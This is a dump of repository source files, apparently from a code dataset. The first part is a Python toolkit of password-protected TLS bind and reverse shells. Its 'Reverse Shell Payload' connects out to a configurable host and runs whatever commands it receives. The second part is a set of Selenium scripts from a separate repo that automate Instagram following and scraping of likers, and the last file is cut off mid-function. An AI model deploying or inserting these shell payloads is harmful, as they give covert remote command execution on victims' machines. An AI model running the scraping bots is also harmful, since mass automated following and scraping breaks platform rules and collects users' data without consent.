"text": "#!/usr/bin/env python3\n\nimport socket\nimport os\nimport subprocess\nimport sys\nimport ssl\nfrom sys import exit\nimport hashlib\nimport hmac\n\n\ndef is_correct_password(salt: bytes, pw_hash: bytes, password: str) -> bool:\n \"\"\"\n Given a previously-stored salt and hash, and a password provided by a user\n trying to log in, check whether the password is correct.\n \"\"\"\n return hmac.compare_digest(\n pw_hash,\n hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)\n )\n\n\n# Run gen_shell_pw.py to generate your hash and salt\npw_hash = '9ee966f577b758ba49181c6ca88d38476958010ee0153116c6471de148ac8b76'\nsalt = '4c78ba4182b1ee8d175ca60321c7122e'\ndebug = True\n\n\ndef main():\n global client\n # global sock\n try:\n try:\n port = int(sys.argv[2])\n except:\n port = 9999\n try:\n ip = sys.argv[1]\n except:\n ip = \"127.0.0.1\"\n\n host = (ip, port)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock = ssl.wrap_socket(s, certfile='../ssl/server.crt', keyfile='../ssl/server.key',\n ssl_version=ssl.PROTOCOL_TLSv1)\n\n try:\n sock.bind(host)\n except OSError:\n print('Address in use!')\n return False\n else:\n sock.listen(1)\n\n while True:\n client, address = sock.accept()\n if debug:\n print(f'Accepted connected from {address[0]}:{address[1]}')\n while True:\n client.send(str.encode('Password: '))\n pw = client.recv(1024)[:].decode('utf-8').rstrip('\\n')\n if is_correct_password(bytes.fromhex(salt), bytes.fromhex(pw_hash), pw):\n authenticated = True\n break\n else:\n client.send(str.encode('Incorrect Password!\\n'))\n if authenticated:\n prompt = os.getcwd() + \"> \"\n client.send(prompt.encode())\n while True:\n cmd = client.recv(1024)\n if debug:\n print(cmd.decode('utf-8'))\n if cmd.decode('utf-8').rstrip('\\n') == '__quit__':\n client.close()\n exit(1)\n\n ter = subprocess.Popen(cmd.decode(\"utf-8\"), shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n res = \"\"\n output_bytes = ter.stdout.read() + ter.stderr.read()\n output_str = output_bytes.decode('utf-8')\n for line in output_str:\n res += line\n ret = res + os.getcwd() + \"> \"\n client.send(ret.encode())\n\n except KeyboardInterrupt:\n try:\n client.send(b\"\\n\\nConnection closed... Goodbye...\\n\")\n except Exception:\n client.close()\n except socket.error:\n client.close()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.46158039569854736,
"alphanum_fraction": 0.47465941309928894,
"avg_line_length": 27.671875,
"blob_id": "dcc71efa8dd39f9a10fef87f24d66af7ed0d7f98",
"content_id": "f33bfd85acc4ebede64a0323e07317f1b13b571d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1835,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 64,
"path": "/bind/connect.py",
"repo_name": "darkerego/py_password_ssl_shells",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\nimport socket\nimport ssl\nimport sys\nfrom sys import exit\nhost = '0.0.0.0'\nport = 9999\n\n\ndef socket_create():\n try:\n\n global ssls\n s = socket.socket()\n ssls = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)\n except socket.error as msg:\n print(\"Socket creation error: \" + str(msg))\n\n\n# Connect to a remote socket\ndef socket_connect():\n try:\n global host\n global port\n ssls.connect((host, port))\n except socket.error as msg:\n print(\"Socket connection error: \" + str(msg))\n else:\n login_prompt = str(ssls.recv(1024).decode())\n # print(client_response)\n if login_prompt == 'Password: ':\n pw = input('Password: ')\n ssls.send(str.encode(pw))\n client_response = ssls.recv(1024).decode()\n if client_response == 'Incorrect Password!\\n':\n print('Invalid password!')\n ssls.close()\n exit(1)\n print('Authenticated!')\n print(client_response, end='')\n\n while True:\n try:\n cmd = input()\n if len(str.encode(cmd)) > 0:\n if cmd == '__quit__':\n ssls.send(str.encode('quit'))\n ssls.close()\n sys.exit()\n else:\n ssls.send(str.encode(cmd))\n client_response = str(ssls.recv(4096).decode())\n print(client_response, end=\"\")\n except KeyboardInterrupt:\n print('Exiting shell...')\n ssls.send(str.encode('__quit__'))\n ssls.close()\n\ndef main():\n socket_create()\n socket_connect()\n\n\nmain()\n"
},
{
"alpha_fraction": 0.586355447769165,
"alphanum_fraction": 0.6025134921073914,
"avg_line_length": 29.282608032226562,
"blob_id": "12e43159bc88f860a03df31e8ce4862f7935234b",
"content_id": "e97ec9618c28cef66f4ae1193bd9f848a809ac2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2785,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 92,
"path": "/reverse/reverse_shell.py",
"repo_name": "darkerego/py_password_ssl_shells",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\nPySslShells - Reverse Shell Payload/Client\nAuthor: Darkerego <[email protected]>\n\"\"\"\nimport socket\nfrom os import getcwd, chdir\nfrom sys import exit\nimport subprocess\nimport ssl\nimport hashlib\nimport hmac\n\n\ndef is_correct_password(salt: bytes, pw_hash: bytes, password: str) -> bool:\n \"\"\"\n Given a previously-stored salt and hash, and a password provided by a user\n trying to log in, check whether the password is correct.\n \"\"\"\n return hmac.compare_digest(\n pw_hash,\n hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)\n )\n\n\ns = socket.socket() # client computer can connect to others\ns = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)\ndebug = True\n# ip address of server, can use own computer's private IP if doing on local\nhost = '127.0.0.1'\nport = 9999\nconnected = False\npw_hash = '9ee966f577b758ba49181c6ca88d38476958010ee0153116c6471de148ac8b76'\nsalt = '4c78ba4182b1ee8d175ca60321c7122e'\n\n# infinite loop for continuous listening for server's commands\n\n\ndef shell():\n while True:\n data = s.recv(4096)\n if data[:2].decode(\"utf-8\") == 'cd':\n chdir(data[3:].decode(\"utf-8\"))\n if data[:2].decode(\"utf-8\") == '__quit__':\n if debug:\n print(data[:2].decode(\"utf-8\"))\n s.close()\n exit(0)\n\n if len(data) > 0: # check if there are actually data/commands received (that is not cd)\n cmd = subprocess.Popen(data[:].decode(\"utf-8\"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n stdin=subprocess.PIPE)\n\n # bytes and string versions of results\n output_bytes = cmd.stdout.read() + cmd.stderr.read() # bytes version of streamed output\n output_str = str(output_bytes, \"utf-8\") # plain old basic string\n\n # getcwd allows the server side to see where the current working directory is on the client\n s.send(str.encode(output_str + str(getcwd()) + '> '))\n # print(output_str) # client can see what server side is doing\n\n\ndef main():\n # Perform server authentication\n authenticated = False\n s.connect((host, port)) # binds client computer to server computer\n auth = s.recv(1024)\n pw = auth[:].decode()\n if is_correct_password(bytes.fromhex(salt), bytes.fromhex(pw_hash), pw):\n authenticated = True\n\n if authenticated:\n prompt = getcwd() + '> '\n s.send(str.encode(prompt))\n\n else:\n s.send(str.encode('Invalid password\\n'))\n exit(1)\n\n# close connection\n if authenticated:\n try:\n shell()\n except KeyboardInterrupt:\n s.close()\n exit(0)\n except Exception as err:\n if debug:\n print('Error:' + str(err))\n s.close()\n exit(0)\nmain()"
},
{
"alpha_fraction": 0.640373170375824,
"alphanum_fraction": 0.6624257564544678,
"avg_line_length": 27.071428298950195,
"blob_id": "ea4827afac626f57996695f8010e461113632684",
"content_id": "46757293d55879504a26fd69c09c505428469b97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1179,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 42,
"path": "/gen_shell_pw.py",
"repo_name": "darkerego/py_password_ssl_shells",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\nfrom typing import Tuple\nimport os\nimport hashlib\nimport hmac\n\n\ndef hash_new_password(password: str) -> Tuple[bytes, bytes]:\n \"\"\"\n Hash the provided password with a randomly-generated salt and return the\n salt and hash to store in the database.\n \"\"\"\n salt = os.urandom(16)\n pw_hash = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)\n return salt, pw_hash\n\n\ndef is_correct_password(salt: bytes, pw_hash: bytes, password: str) -> bool:\n \"\"\"\n Given a previously-stored salt and hash, and a password provided by a user\n trying to log in, check whether the password is correct.\n \"\"\"\n return hmac.compare_digest(\n pw_hash,\n hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)\n )\n\n# hash a password\npw = input('Enter a password: ')\npw2 = input('Confirm Password: ')\nif pw != pw2:\n print('Passwords do not match!. Quitting.')\n exit(1)\n\nsalt, pw_hash = hash_new_password(pw)\nsalt = salt.hex()\npw_hash = pw_hash.hex()\n\nif is_correct_password(bytes.fromhex(salt), bytes.fromhex(pw_hash), pw):\n print('Test Succeeded!')\n print(\"Salt: %s\" % salt)\n print(\"Hash: %s\" % pw_hash)\n"
}
] | 5 |
peterdolan/relationships_data_extraction
|
https://github.com/peterdolan/relationships_data_extraction
|
8bf44fc0aff4b0b483f8f8dfe71b4d58f593a20e
|
95062cb16e00e24a30b1b352cd23cf1dc8a06372
|
3711991c11e476bb6e10e330faa0e72544b95636
|
refs/heads/master
| 2021-05-01T03:26:45.732611 | 2018-03-26T00:58:30 | 2018-03-26T00:58:30 | 121,192,438 | 1 | 0 | null | 2018-02-12T02:53:52 | 2018-03-26T00:19:00 | 2018-03-26T00:46:50 |
Python
|
[
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 19,
"blob_id": "355c287cb8716f2a10f68fdaf97cedec81aa66c8",
"content_id": "2a465c1d2033339a169ad1c18eb2ccff18545db2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 40,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "# relationships_data_extraction\nideas!:\n"
},
{
"alpha_fraction": 0.4955555498600006,
"alphanum_fraction": 0.5122222304344177,
"avg_line_length": 30.034482955932617,
"blob_id": "5902439273ebd6417a52bcb71f258846f003b46f",
"content_id": "b3fc4aef9434473b0f4f2d2f27b3ddb4091f96a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 900,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 29,
"path": "/archive/change_csv.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "import csv\n\nwith open('titles_data.csv', 'rb') as csvfile:\n with open('test_set.py', 'w') as test:\n test.write(\"test_set = [\")\n test_set = []\n reader = csv.reader(csvfile)\n for row in reader:\n new_obj = {}\n poster = {}\n counterpart = {}\n new_obj[\"title\"] = row[0].strip()\n i = 0\n if len(row[1]) > 3:\n new_obj[\"title\"] += row[1]\n i +=1\n if len(row[2]) > 3:\n new_obj[\"title\"] += row[2]\n i +=1\n poster[\"age\"] = row[1 + i].strip()\n poster[\"gender\"] = row[2 + i].strip().upper()\n counterpart[\"age\"] = row[3 + i].strip()\n counterpart[\"gender\"] = row[4 + i].strip().upper()\n counterpart[\"relationship\"] = row[5 + i].strip().lower()\n new_obj[\"poster\"] = poster\n new_obj[\"counterpart\"] = counterpart\n test_set.append(new_obj)\n test.write(str(new_obj).strip() + ',\\n')\n test.write(\"]\")\n"
},
{
"alpha_fraction": 0.5347937941551208,
"alphanum_fraction": 0.5347937941551208,
"avg_line_length": 11.721311569213867,
"blob_id": "af7b43046e54534e83d5277dc927305294765389",
"content_id": "820c73dce7a691f51743c38543940bdd34e5148b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 778,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 61,
"path": "/hardcoded_relationship_descriptor_words.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "self_words = [\n \"me\",\n \"i\",\n \"i've\",\n \"i'm\"\n]\n\nmale_relation_words = [\n \"father\",\n \"dad\",\n \"son\",\n \"brother\",\n \"grandfather\",\n \"grandson\",\n \"father-in-law\",\n \"uncle\",\n \"husband\",\n \"boyfriend\",\n \"bf\",\n \"guy\",\n \"brother-in-law\",\n \"nephew\",\n \"ex-bf\",\n \"ex-boyfriend\",\n]\n\nfemale_relation_words = [\n \"mother\",\n \"mom\",\n \"mum\",\n \"daughter\",\n \"sister\",\n \"grandmother\",\n \"wife\",\n \"granddaughter\",\n \"aunt\",\n \"niece\",\n \"sister-in-law\",\n \"mother-in-law\",\n \"girlfriend\",\n \"gf\",\n \"girl\",\n \"ex-gf\",\n \"ex-girlfriend\",\n]\n\nrelation_words = [\n \"parent\",\n \"children\",\n \"grandparent\",\n \"grandchild\",\n \"so\",\n \"friend\",\n \"roommate\",\n \"crush\",\n \"partner\",\n \"fiance\",\n \"fiancé\",\n \"fiancée\",\n \"cousin\",\n] + male_relation_words + female_relation_words\n"
},
{
"alpha_fraction": 0.6476190686225891,
"alphanum_fraction": 0.6613756418228149,
"avg_line_length": 29.483871459960938,
"blob_id": "8df0114a506cf02c15beef58d275494f24512ac2",
"content_id": "2daa8af650aed743d657ba001e50e47af6f65cf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 945,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 31,
"path": "/data_analysis_functions.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv(filepath_or_buffer=\"/Users/peterdolan/Engineering/reddit/small_relationship_data.csv\")\n\ndef get_distribution():\n plt.figure()\n data[\"post_gen\"].hist(bins = 100, range=[0,100]).plot()\n plt.savefig(\"temp.png\")\n\ndef get_gender_stats():\n#print (data.groupby([\"post_gen\"]).agg(['mean', 'count']))\n print (\"greater than 1: \")\n#print(data.loc[(data[\"score\"] > 1)].groupby([\"post_gen\"]).agg([\"mean\", \"count\"]))\n print(data.loc[(data[\"score\"] > 1) & (data[\"score\"] < 100)].groupby([\"post_gen\"]).agg([\"mean\", \"count\"]))\n\ndef get_relationship_distribution():\n print (data[\"relationship\"].value_counts())\n\ndef get_correlation():\n corr = data[\"post_gen\"].corr(data[\"score\"])\n print ('hi')\n print (corr)\n\ndef get_word_breakdown():\n \n s_corr = data[\"title\"].str.get_dummies(sep=' ').corrwith(data.score/data.score.max())\n print (s_corr)\n\nget_distribution()\n"
},
{
"alpha_fraction": 0.6316176652908325,
"alphanum_fraction": 0.6406862735748291,
"avg_line_length": 38.61165237426758,
"blob_id": "94ef4ba91896f8d304cd7e230d12731d861bff85",
"content_id": "b317e89f0c2b024ad0423e1b0778cc525426ab8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4080,
"license_type": "no_license",
"max_line_length": 265,
"num_lines": 103,
"path": "/title_extraction.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "# Potential improvements: stack rank relationships, take best one found (gf over so for example)\n# spell check/simplifier (huband -> husband for example, daughter's -> daughter)\n# delete \"mid\" from within captured parens\n# compound words get dashed. \"sister in law\" -> \"sister-in-law\"\n\nimport re\nfrom test_set import test_set\nfrom training_set import training_set\nfrom relationship_words import self_words, relation_words, male_relation_words, female_relation_words\n\ndef get_diff(correct, generated):\n if (correct[\"poster\"] == generated[\"poster\"] \n and correct[\"counterpart\"] == generated[\"counterpart\"]):\n return 1\n else:\n print (\"--------------------\")\n print (correct[\"title\"])\n if (correct[\"poster\"][\"gender\"] != generated[\"poster\"][\"gender\"]):\n print (\"Poster gender mismatch. \" + correct[\"poster\"][\"gender\"] + \"|\" + generated[\"poster\"][\"gender\"])\n if (correct[\"poster\"][\"age\"] != generated[\"poster\"][\"age\"]):\n print (\"Poster age mismatch. \" + correct[\"poster\"][\"age\"] + \"|\" + generated[\"poster\"][\"age\"])\n if (correct[\"counterpart\"][\"gender\"] != generated[\"counterpart\"][\"gender\"]):\n print (\"Counterpart gender mismatch. \" + correct[\"counterpart\"][\"gender\"] + \"|\" + generated[\"counterpart\"][\"gender\"])\n if (correct[\"counterpart\"][\"age\"] != generated[\"counterpart\"][\"age\"]):\n print (\"Counterpart age mismatch. \" + correct[\"counterpart\"][\"age\"] + \"|\" + generated[\"counterpart\"][\"age\"])\n if (correct[\"counterpart\"][\"relationship\"] != generated[\"counterpart\"][\"relationship\"]):\n print (\"Counterpart relationship mismatch. \" + correct[\"counterpart\"][\"relationship\"] + \"|\" + generated[\"counterpart\"][\"relationship\"])\n return 0\n\ndef create_poster_object(data):\n poster = {\"age\":\"\", \"gender\":\"\"}\n\n age = re.findall(r'\\d+', data[1])\n if (age and len(age) > 0):\n poster[\"age\"] = age[0]\n\n gender = re.findall('M|F', data[1].upper())\n if (gender):\n poster[\"gender\"] = gender[0]\n\n return poster\n\ndef create_counterpart_object(person, title):\n counterpart = {\"age\":\"\", \"gender\":\"\", \"relationship\":\"\"}\n if (person[0].lower() in relation_words):\n counterpart[\"relationship\"] = person[0].lower()\n\n age = re.findall(r'\\d+', person[1])\n if (age and len(age) > 0):\n counterpart[\"age\"] = age[0]\n\n gender = re.findall('M|F', person[1].upper())\n if (gender):\n counterpart[\"gender\"] = gender[0]\n\n if not counterpart[\"relationship\"]:\n for word in title.split(\" \"):\n if word in relation_words:\n counterpart[\"relationship\"] = word\n break\n\n if counterpart[\"relationship\"] in female_relation_words:\n counterpart[\"gender\"] = \"F\"\n if counterpart[\"relationship\"] in male_relation_words:\n counterpart[\"gender\"] = \"M\"\n\n return counterpart \n\ndef extract_relations(people, title):\n if (people[0][0].lower() in relation_words or people[1][0].lower() in self_words):\n poster = create_poster_object(people[1])\n counterpart = create_counterpart_object(people[0], title)\n else:\n poster = create_poster_object(people[0])\n counterpart = create_counterpart_object(people[1], title)\n \n return {\"poster\": poster, \"counterpart\": counterpart}\n \ndef extract(title):\n people = re.findall(\"(\\w+)\\s?(\\[|\\()(.*?)(\\]|\\))\", title)\n if (len(people) == 2):\n for counter, match in enumerate(people):\n people[counter] = match[0:4:2]\n relationships = extract_relations(people, title)\n relationships[\"title\"] = title\n return relationships\n return \"\"\n\n\ndef extract_list(list):\n total = 0\n total_correct = 0\n for tagged_obj in list:\n relationships = extract(tagged_obj[\"title\"])\n if (relationships != \"\"):\n total += 1\n total_correct += get_diff(tagged_obj, relationships)\n\n print (str(total_correct) + \" out of a possible \" + str(total))\n\n#single = [{\"title\":\"I [18 M] have been dating my gf [18 F] for a month, and I want to build our personal relationship more, rather than our physical relationship\", \"poster\":{\"age\":\"18\", \"gender\":\"M\"}, \"counterpart\":{\"age\":\"18\", \"gender\":\"F\", \"relationship\":\"gf\"}}]\n \n#extract_list(test_set)\n"
},
{
"alpha_fraction": 0.5458422303199768,
"alphanum_fraction": 0.5756929516792297,
"avg_line_length": 26.58823585510254,
"blob_id": "48874b9a68d3cecbbed725b7cf72f300ef5bba2e",
"content_id": "82f15b18965eb2669aa8339360797276f56003a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 469,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 17,
"path": "/general_reddit_data_to_relationship_only.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "import json\n\ndef json_readr(file):\n for line in open(file, mode=\"r\"):\n yield json.loads(line)\n\nf=open(\"relationships_11\", \"a+\")\ntotal = 0\n\ngenerator = json_readr('RS_2017-11')\nfor object in generator:\n if ('subreddit' in object and object['subreddit'] == 'relationships'):\n #f.write(object['subreddit'] + ' ' + object['title'] + '\\n')\n total += 1\n if (total%100 == 0):\n print (total)\n f.write(json.dumps(object))\n"
},
{
"alpha_fraction": 0.5291051268577576,
"alphanum_fraction": 0.5377932190895081,
"avg_line_length": 32.82352828979492,
"blob_id": "1b04e1379b38f2a285a9bd05c83a5625397f568a",
"content_id": "ffa42457b82c3f54cd83b246621f45731deca550",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1151,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 34,
"path": "/write_final_csv.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "import json\nfrom title_extraction import extract\n\ndef json_readr(file):\n for line in open(file, mode=\"r\"):\n yield json.loads(line)\n\nf=open(\"final_relationship_data.csv\", \"a+\")\n\ndef getRelationData():\n total = 0\n generator = json_readr('relationships')\n f.write(\"title,post_age,post_gen,count_age,count_gen,relationship,score,num_comments\")\n for object in generator:\n relationships = extract(object[\"title\"])\n print (relationships)\n if (total < 100000):\n total += 1\n if (relationships != \"\"):\n f.write(\n relationships[\"title\"].replace(\",\", \"\") + \",\" +\n relationships[\"poster\"][\"age\"] + \",\" +\n relationships[\"poster\"][\"gender\"] + \",\" +\n relationships[\"counterpart\"][\"age\"] + \",\" +\n relationships[\"counterpart\"][\"gender\"] + \",\" +\n relationships[\"counterpart\"][\"relationship\"] + \",\" +\n str(object[\"score\"]) + \",\" +\n str(object[\"num_comments\"]) + \"\\n\")\n else:\n break\n#total += 1\n#f.write(object[\"title\"].encode('utf-8') + '\\n')\n\ngetRelationData()\n\n"
}
] | 7 |
hatrick36/Web-scraping-Web-automation
|
https://github.com/hatrick36/Web-scraping-Web-automation
|
af16d33d575efe7bdfdbe45643219455f3c2aef8
|
3265f4f3043ec331a44ea4ba9f3e1fc9ee1fe09b
|
2a3c5cd772ea37d35e1aeba288a8e198960cc927
|
refs/heads/master
| 2023-02-20T11:07:06.019536 | 2021-01-16T02:03:03 | 2021-01-16T02:03:03 | 308,450,868 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6161583662033081,
"alphanum_fraction": 0.6219987273216248,
"avg_line_length": 40.09333419799805,
"blob_id": "4d0ba44faac1739d1f5a729301f12086324c1d8f",
"content_id": "a2ff032e6f6836b1f6066c564f572df6fa5e1c5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3082,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 75,
"path": "/Social_media_automation/Insta_follow.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "# The following program uses selenium to navigate and interact with he instagram platform to follow profiles on the\n# the users suggested page\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\nimport time\n\n\nclass Instabot(object):\n username = None\n \"\"\"\n initializes an instance of the Instabot class.\n \n Call the login function to authenticate a user with IG\n \n Args:\n username:str: The instagram username for the user\n password:str: The instagram password for the user\n \n Attributes:\n driver.Selenium.webdriver.Chrome: The chromedriver that is used to automate browser activity\n \"\"\"\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.driver = webdriver.Chrome('chromedriver80.exe')\n self.base_url = 'https://www.instagram.com'\n self.login()\n\n def login(self):\n # calls chromedriver defined in __init__ navigate to the base url with the formatted text\n self.driver.get('{}/accounts/login/'.format(self.base_url))\n # utilizes webDriverWait to allow chromedriver to load page then clicks and enters credentials via 'send_keys'\n username_element = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.NAME, \"username\")))\n username_element.send_keys(self.username)\n self.driver.find_element_by_name('password').send_keys(self.password)\n #sleep is thorn in to allow pages to load\n time.sleep(1)\n self.driver.find_elements_by_xpath(\"//div[contains(text(), 'Log In')]\")[0].click()\n time.sleep(3)\n def nav_page(self, page):\n # navigates to page specified with kwarg 'page' called in main\n self.driver.get('{}/{}/'.format(self.base_url, page))\n\n def follow_user(self):\n #I put a timer on this function to run for and hour\n timer = time.time()\n period = 60*60\n # finds allow 'follow buttons on the explore page and puts them in a list\n follow_button = WebDriverWait(self.driver, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, \"//button[ \"\n \"contains(\"\n \"text(), \"\n \"'Follow')]\")))\n print(len(follow_button))\n print(timer)\n #the for loop iterates through the list of follow buttons clicking every 30 seconds because instagram limits follows by time\n for follow_button in follow_button:\n\n follow_button.click()\n time.sleep(30)\n if time.time() > timer + period:\n break\n\n\nif __name__ == '__main__':\n ig_bot = Instabot('USERNAME', 'PASSWORD')\n time.sleep(3)\n ig_bot.nav_page('explore/people/suggested')\n ig_bot.follow_user()\n\n print(Instabot.username)\n"
},
{
"alpha_fraction": 0.5956409573554993,
"alphanum_fraction": 0.6071121096611023,
"avg_line_length": 36.09574508666992,
"blob_id": "15afcbac7bd8c5f31b341aaa38fe081f4852804a",
"content_id": "a6310010f7a26e5fb00c72d3f4eb89ff50544175",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3487,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 94,
"path": "/Social_media_automation/Track/get_post_activity_data.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\nimport pandas as pd\nimport time\nfrom selenium.common.exceptions import NoSuchElementException\n\n\n# IMPORTANT: don't try to grab multiple lists from this script just get likers and followers import any other lists\n\nclass Instabot(object):\n username = None\n \"\"\"\n initializes an instance of the Instabot class.\n \n Call the login function to authenticate a user with IG\n \n Args:\n username:str: The instagram username for the user\n password:str: The instagram password for the user\n \n Attributes:\n driver.Selenium.webdriver.Chrome: The chromedriver that is used to automate browser activity\n \"\"\"\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.driver = webdriver.Chrome('../chromedriver80.exe')\n self.base_url = 'https://www.instagram.com'\n self.login()\n\n def login(self):\n self.driver.get('{}/accounts/login/'.format(self.base_url))\n username_element = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.NAME, \"username\")))\n username_element.send_keys(self.username)\n self.driver.find_element_by_name('password').send_keys(self.password)\n time.sleep(1)\n self.driver.find_elements_by_xpath(\"//div[contains(text(), 'Log In')]\")[0].click()\n\n def nav_page(self, page):\n self.driver.get('{}/{}/'.format(self.base_url, page))\n time.sleep(2)\n\n def get_likes(self, amount):\n\n global likes\n time.sleep(1)\n self.driver.find_element_by_class_name('_bz0w').click()\n i = 1\n while i <= amount:\n time.sleep(2)\n try:\n self.driver.find_element_by_xpath(\n '/html/body/div[4]/div[2]/div/article/div[2]/section[2]/div/div[2]/button').click()\n likes = self.get_names()\n print(likes)\n except NoSuchElementException:\n print('not enough activity on post')\n self.driver.find_element_by_xpath(\n '/html/body/div[4]/div[2]/div/article/div[2]/section[2]/div/div[1]').click()\n continue\n i += 1\n df = pd.DataFrame.from_dict({'likes': likes}, orient='index').T\n\n df.to_csv('follow.csv')\n print(df)\n\n def get_names(self):\n time.sleep(1)\n scroll_box = self.driver.find_element_by_xpath('/html/body/div[5]/div/div[2]/div')\n last_ht, ht = 0, 1\n while last_ht != ht:\n last_ht = ht\n time.sleep(1)\n ht = self.driver.execute_script(\"\"\"\n arguments[0].scrollTo(0, arguments[0].scrollHeight)\n return arguments[0].scrollHeight\"\"\", scroll_box)\n links = scroll_box.find_elements_by_tag_name('a')\n names = [name.text for name in links if name.text != '']\n self.driver.find_elements_by_xpath('/html/body/div[5]/div/div[1]/div/div[2]/button')[0].click()\n self.driver.find_element_by_class_name('_65Bje').click()\n return names\n\n\nif __name__ == '__main__':\n ig_bot = Instabot('USERNAME', 'PASSWORD')\n time.sleep(3)\n ig_bot.nav_page('USERNAME')\n ig_bot.get_likes(5)\n ig_bot.get_names()\n print(Instabot.username)\n"
},
{
"alpha_fraction": 0.6104331612586975,
"alphanum_fraction": 0.6211104393005371,
"avg_line_length": 37.56470489501953,
"blob_id": "bfb336c2c16cfcbeb01a2dca538c13dac2b4ce08",
"content_id": "3306c4249d233c68224eab7867d834cd928d0b59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3278,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 85,
"path": "/Social_media_automation/insta_track_ghosts.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\nimport time\nfrom selenium.common.exceptions import NoSuchElementException\n\n#IMPORTANT: don't try to grab multiple lists from this script just get likers and followers import any other lists\n# don't forget you need to convert followers and following to a csv that you can then import into this script\n\nclass Instabot(object):\n username = None\n \"\"\"\n initializes an instance of the Instabot class.\n \n Call the login function to authenticate a user with IG\n \n Args:\n username:str: The instagram username for the user\n password:str: The instagram password for the user\n \n Attributes:\n driver.Selenium.webdriver.Chrome: The chromedriver that is used to automate browser activity\n \"\"\"\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.driver = webdriver.Chrome('chromedriver80.exe')\n self.base_url = 'https://www.instagram.com'\n self.login()\n\n def login(self):\n self.driver.get('{}/accounts/login/'.format(self.base_url))\n username_element = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.NAME, \"username\")))\n username_element.send_keys(self.username)\n self.driver.find_element_by_name('password').send_keys(self.password)\n time.sleep(1)\n self.driver.find_elements_by_xpath(\"//div[contains(text(), 'Log In')]\")[0].click()\n\n def nav_page(self, page):\n self.driver.get('{}/{}/'.format(self.base_url, page))\n time.sleep(2)\n\n def get_ghosts(self, amount):\n\n time.sleep(1)\n self.driver.find_element_by_class_name('_bz0w').click()\n i = 1\n while i <= amount:\n time.sleep(2)\n try:\n 